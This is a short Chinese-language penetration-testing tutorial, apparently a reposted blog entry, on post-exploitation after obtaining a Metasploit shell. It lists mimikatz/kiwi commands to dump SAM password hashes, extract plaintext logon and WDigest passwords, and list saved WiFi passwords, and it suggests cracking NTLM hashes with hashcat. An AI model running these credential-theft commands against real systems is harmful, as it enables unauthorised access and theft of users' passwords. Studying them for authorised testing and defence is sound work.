【渗透测试】基于后期的权限维持

gclome

原文链接：【渗透测试】基于后期的权限维持

利用msf获得系统shell后，就完了？no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？


获取明文密码如下，我们在msf中获得shell后，载入mimikatz模块load mimikatz




这里提示，需要载入kiwi我们再次载入


获取系统hash值

1. mimikatz_command -f samdump::hashes

复制代码

参数说明：
user:用户名
NTLM:hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）
获取密码明文

1. mimikatz_command -f sekurlsa::logonPasswords full
   
2. mimikatz_command -f sekurlsa::wdigest

复制代码

获取目标WiFi密码

1. wifi_list_shared
   

复制代码

获取扫雷的位置

1. mimikatz_command -f winmine::infos

复制代码